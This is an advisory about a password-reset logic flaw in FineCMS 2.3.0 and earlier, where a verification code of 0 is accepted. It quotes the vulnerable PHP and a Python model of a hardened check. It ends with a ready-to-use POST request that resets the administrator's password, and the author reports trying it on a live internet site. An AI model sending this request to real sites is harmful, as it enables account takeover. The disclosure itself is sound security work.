finecms <= 2.3.0 Arbitrary User Password Change - bug warning - the black bar safety net

2016-03-04T00:00:00
ID MYHACK58:62201672166
Type myhack58
Reporter Anonymous (佚名)
Modified 2016-03-04T00:00:00

Description

Affected versions: update number 14418, i.e. 2.3.0 and earlier. The latest version does not have this problem.

WooYun has already published a report (<http://www.wooyun.org/bugs/wooyun-2014-060197>) that resets passwords by brute-forcing the verification code; the method discussed here is far cheaper than brute force.

Look directly at the code that verifies the reset code; the logic analysis is in the comments.

```php
case 2:
    $uid  = (int)$this->input->get('uid');
    $code = (int)$this->input->post('code');   // verification code taken from POST
    // Query the member row by uid AND the submitted code
    $data = $this->db
        ->where('uid', $uid)
        ->where('randcode', $code)
        ->select('salt,uid,username,email')
        ->limit(1)
        ->get('member')
        ->row_array();
    if (!$data) {
        // No row matches this uid/code pair: error out
        $this->member_msg(lang('m-000'));
    }

    $password1 = $this->input->post('password1');
    $password2 = $this->input->post('password2');
    if ($password1 != $password2) {
        $error = lang('m-019');
    } elseif (!$password1) {
        $error = lang('m-018');
    } else {
        // Change the password
        $this->db
            ->where('uid', $data['uid'])
            ->update('member', array(
                // After a successful change the randcode is set to 0!!!!!
                'randcode' => 0,
                'password' => md5(md5($password1) . $data['salt'] . md5($password1))
            ));
        if ($this->get_cache('MEMBER', 'setting', 'ucenter')) {
            uc_user_edit($data['username'], '', $password1, '', 1);
        }
        $this->member_msg(lang('m-052'), dr_url('login/index'), 1);
    }
    break;
}   // end switch
}   // end function
```

The logic problem here is that after the password is changed the verification code (randcode) is set to 0. Looking at the database, this field's default value is also 0, and the check before the update only tests whether the submitted code equals randcode; it never checks whether that value is 0. As a result, submitting 0 as the code directly changes any account's password. In a black-box test of the password reset this would never be noticed.

![](http://xdxd.love/images/finecms5.jpg)
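As an added illustration (not FineCMS code), the step-2 check modelled in Python: the vulnerable lookup accepts the column default 0, while a hardened form treats 0/NULL as "no reset pending", issues a random non-zero single-use code, and clears it rather than zeroing it after use. The member table is constructed for the example.

```python
# Added example, not FineCMS code: a model of the step-2 reset check.
import secrets

# Constructed sample table. As in FineCMS, randcode defaults to 0 and the
# original code writes 0 back after a successful password change.
MEMBERS = {
    1: {"uid": 1, "username": "admin", "randcode": 0, "password": "old"},
    2: {"uid": 2, "username": "bob",   "randcode": 0, "password": "old"},
}

def vulnerable_verify(uid, code):
    """Mirrors the original: a row matching uid AND randcode == (int)code."""
    code = int(code)                      # (int)$this->input->post('code')
    row = MEMBERS.get(uid)
    return row is not None and row["randcode"] == code

def hardened_verify(uid, code):
    """Same lookup, but a stored 0/None/'' means nothing was issued, and the
    submitted code is compared against the stored token in constant time."""
    row = MEMBERS.get(uid)
    if row is None:
        return False
    stored = row["randcode"]
    if not stored:                        # 0, None or '' => no reset pending
        return False
    return secrets.compare_digest(str(stored).encode(), str(code).encode())

def issue_reset_code(uid):
    """Issue a random code in 1..99999999 (never 0) for a pending reset."""
    token = secrets.randbelow(10**8 - 1) + 1
    MEMBERS[uid]["randcode"] = token
    return token

def change_password(uid, code, new_password, hardened=True):
    """Step 2: verify the code, set the password, invalidate the code."""
    verify = hardened_verify if hardened else vulnerable_verify
    if not verify(uid, code):
        return False
    MEMBERS[uid]["password"] = new_password
    # Original writes 'randcode' => 0, which is exactly the value the
    # vulnerable check accepts again. Hardened path clears it to None.
    MEMBERS[uid]["randcode"] = None if hardened else 0
    return True
```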

To exploit it, POST directly to the URL:

http://www.xxxxxxx.com/member/index.php?c=login&m=find&step=2&uid=1

Here uid=1 is the administrator. The POST data is code=0&password1=12345678&password2=12345678. Tested on a live example on the Internet:

![](http://xdxd.love/images/finecms6.jpg)